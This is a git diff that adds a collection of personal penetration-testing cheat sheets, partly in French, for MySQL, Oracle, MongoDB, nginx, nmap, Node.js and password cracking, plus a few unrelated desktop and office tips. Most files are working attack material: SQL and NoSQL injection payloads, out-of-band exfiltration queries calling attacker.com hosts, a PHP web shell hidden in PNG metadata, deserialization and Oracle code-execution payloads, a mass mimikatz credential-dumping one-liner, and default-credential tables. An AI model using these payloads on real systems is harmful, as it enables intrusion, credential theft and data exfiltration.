+# multibyte to bypass mysql-real-escape-string (db driver and db don't talk same charset) http://security.stackexchange.com/questions/9908/multibyte-character-exploits-php-mysql
+login=%bf%27+or+1=1%23 (?)
+login=%a5%27+or+1=1%23 (shift-js) 0xa5 becomes \ when encoded as shift-jis so it will escape the \ inserted by mysql_real_escape_string: 'where color="%s"' % u'blue\u00a5" or 1#'.encode('shift-jis') -> where color="blue\\" or 1#"
+
+# leet tips
+mysql allow chars from 09, 0A-0D, A0 to be used as whitespaces
+mysql utf-8 collation ('Ä' is equal 'a') can bypass php checks: 'orÄnge' will bypass "if ($username === 'orange')"
+select 1,info from information_schema.processlist # afficher la requete SQL
+and 1=1 procedure analyse() # afficher les noms des colonnes du select
+evade IDS with information_schema.{key_column_usage,table_constraints,statistics,partitions}
+select -> select%23randomText%0A and user() -> user%23randomText%0A() # see sqlmap tamper scripts
+select X'31333337' == select 0x31333337
+comments: /*!50000union*/ /*!50000all*/ /*!50000select*/ group_concat(table_name) /*!50000from*/ information_schema.tables
+no space: (select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))
+
+# group_concat to get everything in one line and one column
+select group_concat(schema_name separator 0x2c) from information_schema.schemata;
+select group_concat(table_name,0x2e,column_name,0x0a) from information_schema.columns where table_schema='sqlilabs';
+
+# injection in insert, update, delete statements
+http://dl.packetstormsecurity.net/papers/database/SQLi_Insert.pdf
+DELETE FROM users WHERE id=1 or (SELECT * FROM (SELECT(name_const(version(),1)),name_const(version(),1))a) or '';
+INSERT INTO users (id, username, password) VALUES (1,'Olivia ' or (SELECT * FROM (SELECT name_const((SELECT 2),1),name_const((SELECT 2),1))a) or '', 'Nervo');
+INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT 1 FROM (SELECT count(*),concat((SELECT (SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or '', 'Nervo'); # double query injection
+
+# injection in limit (can't have union after order by see http://raijee1337.blogspot.com.au/2015/07/bypassing-incorrect-usage-of-union-and-order-by.html)
+LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
+https://rdot.org/forum/showpost.php?p=36186&postcount=30
+
+# union based
+fr' order by 1--%20
+fr' union select 'a','b'# # trouver le type de chaque colonne (chaine, entier, date, ...)
+fr' union select @@version,'b'/* # trouver le numero de version
+
+select 'a',table_name from information_schema.tables # lister les tables de la base
+select 'a',column_name from information_schema.columns where table_name='accounts' # lister les colonnes
+select user,password from mysql.users # lire le contenu des tables
+select concat_ws(0x3a,host,user,password) from user # concatener
+
+# error based
+lang=fr' AND (select 1 from (select count(*), concat(0x3a64616a3a,(select version()),0x3a64616a3a,floor(rand(0)*2))as a from information_schema.tables group by a)x) AND 'a'='a # also see double query injection
+lang=fr' AND (select 1 from (select count(*), concat(0x3a64616a3a,(select version()),0x3a64616a3a,floor(rand(0)*2))as a from information_schema.tables group by a)x limit 0,1) AND 'a'='a # if subquery returns more than 1 row
+?id=0 or updatexml(1,concat(0x7e,(version())),0) or
+?id=0 or extractvalue('<xml>',concat("/",(select version())))
+?id=0 or extractvalue(null,concat(0x3a,version()))
+?id=0 or (select*from(select(name_const(version(),1)),name_const(version(),1))a) or
+?id=0 or (select 1 REGEXP if(1=1,'+','.'))
+
+# time blind based
+lang=en' and benchmark(20000000,sha1(1))
+lang=en' AND SLEEP(5)
+lang=existe_pas' OR sleep(2) # will sleep 2 seconds for each record
+
+dbms=mysql&id=1+and+IF((ASCII(SUBSTR((SELECT+1337),${char_index:1},1))${comparator:>}${char_val:0}),SLEEP(2),1)
+
+# turn time based into boolean based
+select 1 REGEXP IF(1=[12],'+','.'); // same with rlike
+select extractvalue('<x>', if(1=[12],'','/')); // may work with other xml functions like updatexml etc.
+select (case when (1=1) then 1 else 1*(select 1 from information_schema.character_sets) end)
+
+# outband
+?id=0 or (SELECT LOAD_FILE(CONCAT(,(SELECT password FROM mysql.user WHERE user=root LIMIT 1),.attacker.com)) ...
+
+# Auditing 
+mysqlaudit.py
+
+* recuperer fichier de configuration
+le my.cnf réellement utilisé (verifier avec lsof ou ps fauxww)
+
+* si configuration avec replication
+- sur le master
+show master status;
+- sur chaque slave
+show slave status\G
+
+* verifier que les fichiers log ne sont pas vides
+
+# usage
+* creer une table
+create table blah (id int(11) not null, libelle varchar(30));
+insert into blah (id, libelle) values (1, 'blah');
+
+* creer/supprimer un utilisateur (mieux vaut toujours preciser le host car c'est @'%' par defaut sinon)
+GRANT ALL PRIVILEGES ON mabdd.* TO 'monty'@'localhost' identified by 'p@ssw0rd';
+GRANT select,update on mabdd.* TO 'monty'@'localhost' identified by 'some_password';
+DROP USER 'monty'@'localhost';
+CREATE USER 'monty'@'localhost' IDENTIFIED BY 'some_password';
+FLUSH PRIVILEGES;
+
+# Password cracking
+http://www.tobtu.com/mysql323.php # old mysql hash
+
+# gui
+https://www.mysql.com/products/workbench/
+
+# optimization
+http://websec.ca/blog/view/optimized_blind_sql_injection_data_retrieval
+http://blog.k3170makan.com/2013/10/even-faster-blind-sql-injection-methods.html
+http://ha.xxor.se/2011/06/speeding-up-blind-sql-injections-using.html
+
+# code exec
+udf (sqlmap or https://github.com/hatRiot/sql3_udf)
+
+# recover root pw
+http://www.percona.com/blog/2014/12/10/recover-mysql-root-password-without-restarting-mysql-no-downtime/
+
+# rdot advanced tricks
+https://rdot.org/forum/showthread.php?p=37133
+https://rdot.org/forum/showthread.php?t=3167
diff --git a/Cheat Sheet/nat-pmp b/Cheat Sheet/nat-pmp
new file mode 100644
index 0000000..2d5bed4
--- /dev/null
+++ b/Cheat Sheet/nat-pmp	
@@ -0,0 +1,4 @@
+# nat-pmp
+
+https://community.rapid7.com/community/metasploit/blog/2014/10/21/r7-2014-17-nat-pmp-implementation-and-configuration-vulnerabilities
+udp port 5351
diff --git a/Cheat Sheet/nessus b/Cheat Sheet/nessus
new file mode 100644
index 0000000..dfac7ea
--- /dev/null
+++ b/Cheat Sheet/nessus	
@@ -0,0 +1,7 @@
+# nessus
+
+# code utilisé pour net-analyzer/nessus-bin-4.0.2-r100
+F082-CFF7-01FE-E96E-EF95
+
+# issues with recommendations
+http://static.tenable.com/documentation/reports/html/PCI_Scan_Hosts_Exec_w_Remediations.html
diff --git a/Cheat Sheet/netsupport b/Cheat Sheet/netsupport
new file mode 100644
index 0000000..cd52097
--- /dev/null
+++ b/Cheat Sheet/netsupport	
@@ -0,0 +1,5 @@
+# netsupport
+
+https://www.trustwave.com/Resources/SpiderLabs-Blog/An-Intro-to-NetSupport-Manager-Scripts/
+https://www.trustwave.com/Resources/SpiderLabs-Blog/NetSupport-Information-Leakage-Using-Nmap-Script/
+https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2014-006/
diff --git a/Cheat Sheet/nginx b/Cheat Sheet/nginx
new file mode 100644
index 0000000..b717c21
--- /dev/null
+++ b/Cheat Sheet/nginx	
@@ -0,0 +1,18 @@
+# nginx
+
+# 2010, discovered by 80sec.com
+http://blah/uploads/hacker.png/x.php
+if not configured properly, will be interpreted as PHP code
+
+echo "<?php system($_GET['c']); ?>" > shell.php
+$ exiftool "-comment<=shell.php" malicious.png # use strings to make sure all's good (http://www.sno.phy.queensu.ca/~phil/exiftool/index.html)
+http://blah/uploads/136991823.png/c.php?c=uname%20-a
+
+# vulns
+* Request line parsing vulnerability (CVE-2013-4547)
+http://mailman.nginx.org/pipermail/nginx-announce/2013/000125.html
+nginx 0.8.41 through 1.4.3 and 1.5.x before 1.5.7 allows remote attackers to bypass intended restrictions via an unescaped space character in a URI.
+
+* (CVE-2013-2070)
+http://mailman.nginx.org/pipermail/nginx-announce/2013/000114.html
+A memory disclosure vulnerability is present in nginx versions 1.1.4 to 1.2.8 and 1.3.0 to 1.4.0. The vulnerability is present if proxy_pass to untrusted upstream HTTP servers is used.  The vulnerability could also lead to a denial of service.
diff --git a/Cheat Sheet/nmap b/Cheat Sheet/nmap
new file mode 100644
index 0000000..549d3c8
--- /dev/null
+++ b/Cheat Sheet/nmap	
@@ -0,0 +1,68 @@
+# nmap
+
+# nse (Nmap Scripting Engine)
+hsc newsletter dec 2k8
+
+# psexec
+nmap 1.2.3.4 --script smb-psexec --script-args=config=network,smbuser=administrator,smbpass=Password1
+
+# fyodor talk at defon 16 (2008)
+== firewall ==
+best against stateful firewall: send a SYN probe
+$ nmap -sP -PS80 sun.com
+best against stateless firewall: send an ACK probe
+$ nmap -sP -PA80 sun.com
+
+== TCP and IP header options ==
+--ip-options "L 10.0.0.2" (source routing)
+
+== More effective host discovery ==
+- send both SYN and ACK probes!
+- send UDP probe, if port is closed => target is alive
+- when ping/echo is blocked, try an other ICMP probe
+
+-sP -PE -PP -PS21,22,23,... -PA80,113,... --source-port 53 (masquarade DNS)
+-PU 
+
+== Top ports ==
+nmap now scans the top 1000 ports for each protocol
+UDP scan much quicker (13 seconds): nmap -sUV -F -T4 --version-intensify 0
+--top-ports [...|500|1000|2000|...] (default is 1000) 
+  tcp: top 3674 ports is 100% effective
+  udp: top 1017 ports is 100% effective
+top 10 is:
+ tcp: 80, 23, 22, 443, 3389, 445, 139, 21, 135, 25
+ udp: 137 (netbios-ns) 161 (snmp) 1434 (ms-sql-m) 123 (ntp) 138 (netbios-dgm) 445 (ms-ds) 135 (msrpc) 67 (dhcps) 139 (netbios-ssn) 53 (domain)
+
+== Timing ==
+--min-rate --max-rate (packets per second: just go the speed i say, do not bother with probes being dropped)
+--max-scan-delay (solaris responds with 1 ICMP message per second)
+--min-hostgroup 
+--max_rtt_timeout --initial_rtt_timeout (traceroute)
+
+== helpers ==
+--reason (syn-ack or reset)
+-oA mylog-%T-%D (time & date)
+
+== ncat ==
+"netcat improved"
+connection brokerin? (bypassing NATs)
+
+# top ports
+grep -v '^#' /usr/share/nmap/nmap-services | awk -F' ' '{print $3" "$2" "$1}' | sort -nr | head -n 100
+
+# more effective ping scan
+-sn (formerly known as -sP) by default does: -PE -PS443 -PA80 -PP
+more advanced; 
+-PE # icmp echo
+-PS80,23,22,443,3389,445,139,21,135,25 # top 10 most common ports
+-PA80 # send ack
+-PP # icmp timestamp
+-PU # send udp packet to 40125/udp, machine is up if ICMP port unreachable
+
+# jdwp
+nmap -v -iL targets.txt -p8000,8787,8788,9009,7777,8453,5005,3999,5000,18000,9001 -Pn
+
+# ultimate cmd line
+nmap -v -iL targets.txt -PE -PS80,23,22,443,3389,445,139,21,135,25 -PA80 -PP -PU -T4 -sV --reason
+
diff --git a/Cheat Sheet/nodejs b/Cheat Sheet/nodejs
new file mode 100644
index 0000000..8c453be
--- /dev/null
+++ b/Cheat Sheet/nodejs	
@@ -0,0 +1,9 @@
+# nodejs
+
+# rce in mathjs
+https://capacitorset.github.io/mathjs/
+
+# vuln unserialize() in node-serialize
+https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/
+{"rce":"_$$ND_FUNC$$_function (){require('child_process').exec('bash -c \"bash ...\"')}()"}
+
diff --git a/Cheat Sheet/nortel b/Cheat Sheet/nortel
new file mode 100644
index 0000000..3b11c28
--- /dev/null
+++ b/Cheat Sheet/nortel	
@@ -0,0 +1,38 @@
+# nortel
+
+# default creds
+                     Model                      | Username        Password
+------------------------------------------------+---------------+-----------------
+Meridian Link                                   | disttech  | 4tas
+Meridian Link                                   | maint   | maint
+Meridian Link                                   | mlusr   | mlusr
+Remote Office 9150                              | admin   | root
+Accelar (Passport) 1000 series routing switches | l2    | l2
+Accelar (Passport) 1000 series routing switches | l3    | l3
+Accelar (Passport) 1000 series routing switches | ro    | ro
+Accelar (Passport) 1000 series routing switches | rw    | rw
+Accelar (Passport) 1000 series routing switches | rwa     | rwa
+Extranet Switches                               | admin   | setup
+Baystack 350-24T                                | n/a     | secure
+Meridian PBX                                    | login   | 0
+Meridian PBX                                    | login   | 1111
+Meridian PBX                                    | login   | 8429
+Meridian PBX                                    | spcl    | 0
+Meridian MAX                                    | service   | smile
+Meridian MAX                                    | root    | 3ep5w2u
+Matra 6501 PBX                                  | (none)  | 0
+Meridian MAX                                    | maint   | ntacdmax
+Meridian CCR                                    | service   | smile
+Meridian CCR                                    | disttech  | 4tas
+Meridian CCR                                    | maint   | maint
+Meridian CCR                                    | ccrusr  | ccrusr
+Meridian                                        | n/a     | (none)
+Meridian Link                                   | service   | smile
+Contivity Extranet/VPN switches                 | admin   | setup
+dms                                             | n/a     | (none)
+Business Communications Manager 3.5 and 3.6     | supervisor  | PlsChgMe
+Phone System All                                | n/a     | 266344
+Norstar                                         | 266344  | 266344
+p8600                                           | n/a     | (none)
+VPN Gateway                                     | admin   | admin
+Passport 2430                                   | Manager   | (none)
diff --git a/Cheat Sheet/nosql b/Cheat Sheet/nosql
new file mode 100644
index 0000000..c3feaaa
--- /dev/null
+++ b/Cheat Sheet/nosql	
@@ -0,0 +1,31 @@
+# nosql
+
+As opposed to SQL databases who almost all support the same syntax, NoSQL databases have different syntax.
+
+# tools
+https://www.reddit.com/r/netsec/comments/3g4mr2/nosql_exploitation_framework_v20/
+
+# MongoDB
+                  SQL   |  NoSQL
+true condition: or 1=1  | || 1==1
+comment:                | NULL BYTE, //, <!--
+
+password=asdf' or 1=1 # | password=asdf' || 1=1 //
+
+* bypass auth
+login.php?username=admin&password[$ne]=bar (https://www.idontplaydarts.com/2010/07/mongodb-is-vulnerable-to-sql-injection-in-php-at-least/, http://blog.imperva.com/2014/10/nosql-ssji-authentication-bypass.html)
+login.php?username=admin&password[$regex]=^P4ss to recover pw
+
+login.php?username[$ne]=foo&password[$ne]=bar will login as first account e.g. frank
+login.php?username[$gt]=frank&password[$ne]=bar to login as other accounst (or use $lt to go the other direction)
+
+* union
+search='+%26%26+this.password.match(/.*/)//+%00 -> results
+search='+%26%26+this.password.match(/zZzZ/)//+%00 -> no result
+search='+%26%26+this.passwordzz.match(/.*/)//+%00 -> error
+
+in case the password field does not exist for some records (since it's a NoSQL database), it's always a good idea to ensure its presence using:
+search='+%26%26+'this.password+%26%26+this.password.match(..
+
+* backdoor
+r/w access via port 27017/tcp (usually even accessible on Internet)
diff --git a/Cheat Sheet/notify b/Cheat Sheet/notify
new file mode 100644
index 0000000..2e7258b
--- /dev/null
+++ b/Cheat Sheet/notify	
@@ -0,0 +1,28 @@
+# notify
+
+# nice popups
+cat .themes/Wesh/xfce-notify-4.0/gtkrc
+style "wesh-window"
+{
+    bg[NORMAL] = "#111111"
+    XfceNotifyWindow::border-color = "#ffff00"
+    XfceNotifyWindow::border-radius = 6.0
+    XfceNotifyWindow::border-width = 0.0
+}
+class "XfceNotifyWindow" style "wesh-window"
+
+style "wesh-text"
+{
+    fg[NORMAL] = "#ffffff"
+    GtkWidget::link-color = "#0000ff"
+}
+widget_class "XfceNotifyWindow.*.<GtkLabel>" style "wesh-text"
+
+style "wesh-btn"
+{
+    bg[NORMAL] = "#9400d3"
+    bg[PRELIGHT] = "#0077ff"
+}
+widget "XfceNotifyWindow.*.GtkButton" style "wesh-btn"
+
+run xfce4-notifyd-config to set Wesh as default
diff --git a/Cheat Sheet/oauth b/Cheat Sheet/oauth
new file mode 100644
index 0000000..0c80836
--- /dev/null
+++ b/Cheat Sheet/oauth	
@@ -0,0 +1,6 @@
+# open redirects / oauth / openid
+
+https://developer.salesforce.com/page/Inside_OpenID_Connect_on_Force.com
+
+http://homakov.blogspot.com.au/2014/05/covert-redirect-faq.html
+http://www.oauthsecurity.com/
diff --git a/Cheat Sheet/ooffice b/Cheat Sheet/ooffice
new file mode 100644
index 0000000..1586dc2
--- /dev/null
+++ b/Cheat Sheet/ooffice	
@@ -0,0 +1,5 @@
+# office
+
+# pour inserer une ou plusieurs pages en mode landscape
+faire menu Insert -> Manual Break et choisir le mode Landscape
+puis pour revenir en mode normal faire un autre Manual Break avec le mode Default
diff --git a/Cheat Sheet/openedge b/Cheat Sheet/openedge
new file mode 100644
index 0000000..6a7d14c
--- /dev/null
+++ b/Cheat Sheet/openedge	
@@ -0,0 +1,14 @@
+# openedge
+
+p = "theeaglehaslandedandthefatmanwalksalone"
+
+def md5_4k(s):
+  for i in range(4000):
+    s = md5(s).digest()
+  return s
+
+first_half = md5_4k(p).encode('hex')
+print 'first half: %s' % first_half
+
+second_half = md5_4k(first_half.decode('hex')+p).encode('hex')
+print 'second half: %s' % second_half
diff --git a/Cheat Sheet/openssh b/Cheat Sheet/openssh
new file mode 100644
index 0000000..dcfd8fd
--- /dev/null
+++ b/Cheat Sheet/openssh	
@@ -0,0 +1,7 @@
+# openssh
+
+* xauth command injection CVE-2016-3115 <=7.2p1 (post auth)
+requires X11Forwarding yes on server
+bypass /bin/false and forced-commands (but not /bin/nologin)
+https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115
+http://seclists.org/fulldisclosure/2016/Mar/46
diff --git a/Cheat Sheet/openssl b/Cheat Sheet/openssl
new file mode 100644
index 0000000..c8e14fa
--- /dev/null
+++ b/Cheat Sheet/openssl	
@@ -0,0 +1,28 @@
+# openssl
+
+openssl ciphers -v HIGH:MEDIUM:-SSLv2
+
+# generer un certificat auto-signé
+openssl req -x509 -newkey rsa:1024 -keyout cakey.pem -out cacert.pem -nodes
+
+openssl req -new -newkey rsa:1024 -keyout key.pem -out csr.pem -nodes
+openssl x509 -req -in csr.pem -out cert.pem -CA cacert.pem -CAkey cakey.pem -CAcreateserial
+
+#openssl x509 -req -in req.pem -extfile openssl.cnf -extensions v3_usr -CA ca.crt -CAkey ca.key -CAcreateserial
+
+# pfx
+openssl pkcs12 -in blah.pfx -passin pass:password -nodes
+
+# dtls CVE-2014-0195:
+http://securityintelligence.com/cve-2014-0195-adventures-in-openssls-dtls-fragmented-land/
+
+# verify private key matches certificate
+openssl x509 -noout -modulus -in certificate.crt | openssl md5
+openssl rsa -noout -modulus -in privateKey.key | openssl md5
+openssl req -noout -modulus -in CSR.csr | openssl md5
+
+# changecipherspec
+CVE-2014-0224 (https://www.openssl.org/news/secadv_20140605.txt)
+https://www.imperialviolet.org/2014/06/05/earlyccs.html
+http://www.tripwire.com/state-of-security/incident-detection/detection-script-for-cve-2014-0224-openssl-cipher-change-spec-injection/
+
diff --git a/Cheat Sheet/opensso b/Cheat Sheet/opensso
new file mode 100644
index 0000000..8cccdc6
--- /dev/null
+++ b/Cheat Sheet/opensso	
@@ -0,0 +1,18 @@
+# opensso
+
+# default users
+http://docs.oracle.com/cd/E19575-01/820-3885/gjred/index.html
+
+amadmin and dsameuser (UrlAccessAgent) 's passwords are set up during install
+
+# console admin
+https://host:port/<deploy_uri>/console
+
+otherwise try:
+/UI/Login/?module=DataStore
+
+# decrypt encrypted password in config
+http://idp.ssocircle.com/sso/toolbox/ossoPwEncrypt.jsp
+
+# openam
+https://idmdude.com/tag/c66encoded/
diff --git a/Cheat Sheet/oracle b/Cheat Sheet/oracle
new file mode 100644
index 0000000..cbefa5d
--- /dev/null
+++ b/Cheat Sheet/oracle	
@@ -0,0 +1,131 @@
+# oracle
+
+# cve-2012-3137 offline passsord cracking
+http://www.teamshatter.com/topics/general/team-shatter-exclusive/oracle-database-11g-stealth-password-cracking-vulnerability-in-logon-protocol-cve-2012-3137/
+http://www.cernatis.com/index.php/blog/all-postings/item/5-oracle-database-authentication-protocol-security-bypass-vulnerability
+http://github.com/r1-/cve-2012-3137
+https://github.com/hantwister/o5logon-fetch
+
+# batched statements
+dbms_xmlgen.newcontext()
+
+# Oracle Report (/reports/rwservlet)
+http://netinfiltration.com/
+https://github.com/Mekanismen/pwnacle-fusion
+
+# some good articles on pentesting Oracle
+www.notsosecure.com
+
+# RedoWalker dumps Oracle redo logs to an XML format; it specifically dumps redo entries fro DDL, INSERTs, UPDATEs, DELETEs and associated UNDO records.
+http://www.davidlitchfield.com/redowalker.htm
+
+# testing for unprotected listener
+metasploit: scanner/oracle/tnslsnr_version et scanner/oracle/sid_enum
+tnscmd.pl ou tnscmd10g.pl
+
+# testing locally
+lsnrctl (somewhere under $ORACLE_HOME/bin)
+
+## audit
+set heading off
+spool c:\temp\spool.log
+
+select user from dual;
+select * from v$version;
+select * from dba_registry  -- installed database components
+select * from dba_registry_history -- get patch level
+... oracle.pdf
+Autres types de privileges, verifier que les comptes de production sont restreints
+Auditing: parametres de configuration, en rapport avec la securité, politique de mot de passe
+
+## pentest
+# confirming Oracle
+id=1 AND ROWNUM=ROWNUM
+id=1 AND LENGTH(SYSDATE)=LENGTH(SYSDATE)
+
+# arbitrary value to test injection
+select 1 from dual
+select 'foo' from dual
+
+# current user
+select user from dual
+select sys.login_user from dual
+
+# version
+select banner from v$version where rownum=1 # blind => pas plus d'1 seule ligne
+select version from v$instance # version en plus court
+
+# sid, service_name, ...
+select global_name from global_name
+select sys.database_name from dual
+select name from v$database
+select instance_name from v$instance
+show parameter instance_name
+show parameter service_names
+
+# system information
+SELECT dbms_utility.port_string FROM dual
+select UTL_INADDR.get_host_address from dual
+select UTL_INADDR.get_host_name from dual
+
+# tables
+select table_name from user_tables # tables you own
+select table_name from all_tables  # tables you can access
+select distinct table_name from user_tab_privs
+select object_name from user_objects where object_type = 'TABLE';
+select table_name from all_tables where table_name not like '%$%' and owner NOT IN ('SYS', 'SYSTEM', 'OUTLN', 'TSMSYS', 'DBSNMP', 'WMSYS', 'SYSMAN', 'MDSYS')
+
+# colonnes
+select column_name from user_tab_columns where table_name='UNE_TABLE'
+select column_name from all_tab_columns where table_name='UNE_TABLE'
+
+# owners - proprietaires de schemas
+select distinct owner from all_tables
+select distinct owner from all_tables where table_name not like '%$%' and owner NOT IN ('SYS', 'SYSTEM', 'OUTLN', 'TSMSYS', 'DBSNMP', 'WMSYS', 'SYSMAN', 'MDSYS')
+select owner from (select ROWNUM R, owner from (select distinct(owner) from all_tables)) where r=$i # blind sqli
+
+# users
+select username from all_users # ou sys.all_users
+select name, password from sys.user$
+select username,password,account_status from dba_users;
+
+# sortir
+select UTL_INADDR.get_host_address('d2t.attacker.com') from dual
+select UTL_HTTP.REQUEST('http://1.2.3.4:53/?q='||(select 123 from dual)) from dual
+SELECT HTTPURITYPE('http://1.2.3.4/?q='||(select 123 from dual)).getXML() FROM DUAL; # pas possible de specifier un port different
+select UTL_FILE. FIXME
+
+# fichier
+select value from v$parameter where name = 'utl_file_dir';
+select * from all_directories where rownum=1; # DIRECTORY_NAME, DIRECTORY_PATH
+select * from dba_directories where rownum=1; # DIRECTORY_NAME, DIRECTORY_PATH
+
+# liste des privileges
+select * from session_privs
+select * from user_sys_privs
+select * from user_role_privs
+select * from user_tab_privs
+select * from dba_sys_privs
+select * from dba_role_privs
+select * from dba_tab_privs
+
+select * from dba_sys_privs where grantee = 'DBSNMP'
+select * from dba_role_privs where grantee = sys.login_user
+
+select grantee from dba_sys_privs where privilege = 'SELECT ANY DICTIONARY'
+select grantee from dba_role_privs where granted_role='DBA' # liste des DBAs
+
+# blind sqli
+select count(*) from UNE_TABLE
+select count(*) from all_tab_columns where table_name = 'UNE_TABLE'
+for i in {1..49}; do ./a.py "select column_name from (select ROWNUM R,column_name from all_tab_columns where table_name = 'UNE_TABLE') where R=$i"; done
+
+# time-based blind sqli: use heavy queries
+select 1 from dual where (select count(*) from user_objects,user_objects, user_objects)=0;
+
+# pls
+curl -v 'https://blah/pls/portal/%0A' -> <set-cookie>
+curl -H 'Cookie: <set-cookie>' https://blah/dav_portal/portal/
+
+# rce through dbms_java.runjava
+select dbms_java.runjava('com/sun/tools/script/shell/Main -e "var p = java.lang.Runtime.getRuntime().exec(''$cmd'');"') from dual
diff --git a/Cheat Sheet/osx b/Cheat Sheet/osx
new file mode 100644
index 0000000..4d4b23b
--- /dev/null
+++ b/Cheat Sheet/osx	
@@ -0,0 +1,13 @@
+# macosx
+
+http://randomthoughts.greyhats.it/2014/10/osx-local-privilege-escalation.html
+
+* rootpipe not fixed pre-yosemite, and unsufficient patch on yosemite (10.10.3)
+https://objective-see.com/blog.html
+
+* dyld
+https://www.sektioneins.de/en/blog/15-07-07-dyld_print_to_file_lpe.html
+https://luismiras.github.io/muymacho-exploiting_DYLD_ROOT_PATH/
+
+* local root < 10.11
+https://github.com/kpwn/tpwn
diff --git a/Cheat Sheet/parallel b/Cheat Sheet/parallel
new file mode 100644
index 0000000..e7efc34
--- /dev/null
+++ b/Cheat Sheet/parallel	
@@ -0,0 +1,4 @@
+# parallel
+
+# mimikatz everything (paul h)
+hip=$(ifconfig eth0 | grep -o '[0-9.]\{8,16\}' | head -n1); sort -R targets.txt | parallel -P10 --timeout 60 --tag -q pth-winexe --system --uninstall -U "$CREDS" //{} "cmd /c IF %PROCESSOR_ARCHITECTURE%==x86 (\\\\$hip\\smb_share\\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit) else (\\\\$hip\\smb_share\\mimikatz64.exe privilege::debug sekurlsa::logonpasswords exit)" 2> parallel.error | tee -a mimikatz_everything.txt
diff --git a/Cheat Sheet/pass-the-hash b/Cheat Sheet/pass-the-hash
new file mode 100644
index 0000000..2bcc787
--- /dev/null
+++ b/Cheat Sheet/pass-the-hash	
@@ -0,0 +1,4 @@
+# pass the hash pth
+
+http://passing-the-hash.blogspot.com.au/2013/02/the-other-ms-recommendations.html
+http://blog.secureideas.com/2013/08/defending-against-pass-hash-pth-attacks.html (not sure if worth reading)
diff --git a/Cheat Sheet/password b/Cheat Sheet/password
new file mode 100644
index 0000000..62ce867
--- /dev/null
+++ b/Cheat Sheet/password	
@@ -0,0 +1,92 @@
+# password
+
+# most common passwords on AD
+Password1
+P@ssw0rd
+P@ssw0rd1
+Passw0rd!
+Password123
+Welcome1
+Welcome123
+
+# passphrase cracking tool
+http://www.leidecker.info/projects/phrasendrescher/
+
+# top 5 biggest online hash crackers (src: http://www.md5decrypter.co.uk/)
+http://www.cmd5.org/
+http://www.c0llision.net/
+http://www.tobtu.com/
+http://www.tmto.org/
+http://www.md5decrypter.co.uk/
+http://crackstation.net/
+
+# online md5 cracker (old list)
+http://md5crack.com/
+http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php
+http://md5.thekaine.de/
+http://md5decryption.com/
+http://www.hashchecker.de/ (not working)
+http://www.hashhub.com/ (not working)
+http://hashkiller.com/index.php?topic=1139.0 (dead)
+http://opencrack.hashkiller.com/ (dead)
+http://www.hackcommunity.net/printthread.php?tid=64 (dead)
+http://www.objectif-securite.ch/en/products.php#Demo (LM)
+
+# online checker tools
+http://sourceforge.net/projects/md5-utils/
+
+# reverse cisco type 7 and juniper $9$
+https://github.com/supertylerc/decrypt.git
+
+# brute force speed
+http://www.lockdown.co.uk/?pg=combi
+
+# default password list
+http://www.vulnerabilityassessment.co.uk/passwords.htm
+http://www.cirt.net/passwords
+http://www.phenoelit-us.org/dpl/dpl.html
+http://www.governmentsecurity.org/articles/default-logins-and-passwords-for-networked-devices.html
+http://www.virus.org/default-password/
+http://www.securityparadigm.com/defaultpw.htm (brice:/data/wordlists/password.lst)
+http://www.default-password.info
+http://www.routerpasswords.com/
+
+# password lists / wordlists
+http://wordlists.capsop.com/
+http://blog.g0tmi1k.com/2011/06/dictionaries-wordlists.html
+http://www.insidepro.com/eng/download.shtml
+http://hashcrack.blogspot.com/p/downloads.html
+http://www.insidepro.com/eng/download.shtml
+http://www.cotse.com/tools/wordlists1.htm et wordlists2.htm
+http://www.aircrack-ng.org/doku.php?id=faq#where_can_i_find_good_wordlists
+http://www.skullsecurity.org/wiki/index.php/Passwords
+http://www.openwall.com/wordlists/ and ftp://ftp.openwall.com/pub/wordlists/ (sort+merge of http://theargon.com/achilles/wordlists/)
+
+# generer des wordlists (password profiling)
+http://carnal0wnage.attackresearch.com/node/384
+wordhoud
+cewl
+wyd
+awlg
+# customiser --rules
+JtrMakeConfig
+
+# password recovery firefox
+http://securityxploded.com/tools.php
+
+# number of permutations given a charset of N characters => N!
+Exemple: jeu: abc, nombre de permutations => 3! = 6
+abc
+acb
+bac
+bca
+cab
+cba
+
+# number of combinations of k chars among a charset of n chars => n!/k!(n-k)!
+Exemple: jeu: abcd, n=3, k=2, nombre de combinaisons => 4
+xyz
+abc
+bac
+cba
+bca
diff --git a/Cheat Sheet/password_cracking b/Cheat Sheet/password_cracking
new file mode 100644
index 0000000..e3583b2
--- /dev/null
+++ b/Cheat Sheet/password_cracking	
@@ -0,0 +1,78 @@
+# password cracking gpu
+
+# distributed
+https://github.com/jmmcatee/cracklord
+http://www.adaptivecomputing.com/products/open-source/torque/
+
+# netntlm protocol
+http://davenport.sourceforge.net/ntlm.html
+
+# hash formats cheatsheets
+https://hashcat.net/wiki/doku.php?id=example_hashes
+http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats
+http://www.insidepro.com/hashes.php # generate all possible hashes
+
+# methodologies
+https://www.netspi.com/blog/entryid/222/gpu-password-cracking-building-a-better-methodology
+
+# hashcat automation / frontend
+http://tickorone.wordpress.com/2012/06/02/password-analysis-to-hashcat-path-script/
+
+# leaks
+http://www.adeptus-mechanicus.com/codex/hashpass/hashpass.php
+http://www.skullsecurity.org/wiki/index.php/Passwords
+
+# brice
+GTX 460
+
+# CUDA-mutiforcer
+forums: --threads 768 -m 200 --blocks 120
+brice: --threads 512 --blocks 120 -m 50
+
+$ cd hashsplit && split hasfile.txt # each hashfile must be less 1024 lines
+$ for i in hashsplit/*; do ./CUDA-Multiforcer-CPP -f "$i" -h SSHA -o ~/cuda.out --min 7 --max 9 -c charsets/charsetnumeric --threads 256 --blocks 60 --debug; done
+
+# http://blog.distracted.nl/
+EmDebr MD5
+EnTibr NTLM
+SHAbr SHA-1
+
+# ignashgpu
+ighashgpu -t:md5 -c:csd -min:4 -max:7 hash.txt
+
+# BarsWF
+http://3.14.by/en/md5
+
